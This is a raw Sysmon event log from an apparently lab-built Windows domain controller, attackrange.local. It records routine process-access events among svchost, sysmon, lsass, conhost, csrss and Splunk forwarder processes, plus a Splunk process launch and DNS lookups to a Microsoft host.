10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.480{5D479F2C-169F-5F84-0B00-000000007F01}8643328C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+70fae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+80a84|C:\Windows\SYSTEM32\ntdll.dll+29c02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.339{5D479F2C-16BF-5F84-6E00-000000007F01}38484052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BF-5F84-6E00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16BF-5F84-6E00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.183{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BF-5F84-6E00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.016{5D479F2C-16BF-5F84-6E00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.386{5D479F2C-16A1-5F84-1400-000000007F01}1308win10.ipv6.microsoft.com.1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.386{5D479F2C-16A1-5F84-1000-000000007F01}1144win10.ipv6.microsoft.com.1460-C:\Windows\System32\svchost.exe 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BF-5F84-6F00-000000007F01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16BF-5F84-6F00-000000007F01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:36.027{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BF-5F84-6F00-000000007F01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 